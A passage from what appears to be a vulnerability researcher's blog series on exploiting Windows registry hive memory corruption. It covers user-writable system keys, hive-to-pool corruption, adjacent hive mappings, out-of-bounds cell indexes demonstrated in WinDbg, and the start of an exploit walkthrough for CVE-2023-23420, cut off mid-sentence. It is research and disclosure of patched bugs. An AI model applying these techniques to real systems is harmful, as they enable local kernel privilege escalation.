HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation. To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive. Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include: HKLM\SOFTWARE\Microsoft\CoreShell HKLM\SOFTWARE\Microsoft\DRM HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Shell\Oobe HKLM\SOFTWARE\Microsoft\Shell\Session HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Windows\UpdateApi HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys) HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind. Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to: Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario. As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security. In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.Abusing regf inconsistency to trigger kernel pool corruption While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures. For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.  However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur. This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.Inter-hive memory corruption So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.Other hive mappings in the user space of the Registry process Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below. 0: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS ffffa58fa069f040     SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000     DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.     Image: System PROCESS ffffa58fa074a080     SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004     DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount:     Image: Registry [...] 0: kd> .process ffffa58fa074a080 Implicit process is now ffffa58f`a074a080 WARNING: .cache forcedecodeuser is not enabled 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them. However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory. For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout: 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result: 0: kd> db 0x15280400000-30 00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA.... 00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@...... 00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ 00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB 00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB 00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other. After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.Attacking adjacent memory in pool-based hive mappings Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows: All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.The entire HKLM\SYSTEM hive, including both its stable and volatile parts.All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.Volatile storage space of every active hive in the system. The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below: This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command: 0: kd> !reg hivelist --------------------------------------------------------------------------------------------------------------------------------------------- |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName  --------------------------------------------------------------------------------------------------------------------------------------------- [...] | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat [...] As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index: 0: kd> !reg cellindex ffff82828fc1a000 80001000 Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0 MapTable     = ffff82828fe6a000  MapEntry     = ffff82828fe6a018  BinAddress = ffff82828f096009, BlockOffset = 0000000000000000 BlockAddress = ffff82828f096000  pcell:  ffff82828f096004 It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data: 0: kd> db ffff82828f096000 ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............ ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ... ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................ ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................ ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?....... ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59 ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?... Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address: 0: kd> !pool ffff82828f096000 Pool page ffff82828f096000 region is Paged pool *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes                 Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it? 0: kd> !pool ffff82828f096000+1000 Pool page ffff82828f097000 region is Paged pool *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes                 Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob 0: kd> !pool ffff82828f096000+2000 Pool page ffff82828f098000 region is Paged pool *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes                 Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.The ultimate primitive: out-of-bounds cell indexes The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes. As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table: The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below: What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green). This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below: In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors. On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options. If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following: The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right. Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields: 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]     0xffff82828fe6a000 [Type: _HMAP_TABLE *] 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm) (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]     0xffff82828fdcc8e0 [Type: _CM_RM *] In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18). 0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive) (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]     0xffff82828fc1a000 [Type: _CMHIVE *] So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure. 0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18 nt!_HMAP_ENTRY    +0x000 BlockOffset      : 0    +0x008 PermanentBinAddress : 0xffff8282`8fc1a000    +0x010 MemAlloc         : 0 The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example. We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function: >>> def MakeCellIndex(storage, directory, table, offset): ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset)) ... And then pass the values we have established so far: >>> MakeCellIndex(1, 0x193, 3, 0) 0xb2603000 >>> So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended. 0: kd> !reg cellindex ffff82828fc1a000 b2603000 Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0 MapTable     = ffff82828fdcc8e0  MapEntry     = ffff82828fdcc928  BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000 BlockAddress = ffff82828fc1a000  pcell:  ffff82828fc1a004 Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.Writing the exploit At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.Step 0: Choosing the vulnerability Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.CVE-2022-34707 The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes. Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.CVE-2023-23420 This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations. In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!Step 1: Abusing the UAF to establish dynamically-controlled value cells Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout: At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent. Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps: Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).Committing the entire transaction by calling the NtCommitRegistryTransaction syscall. After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly: We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome: All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the 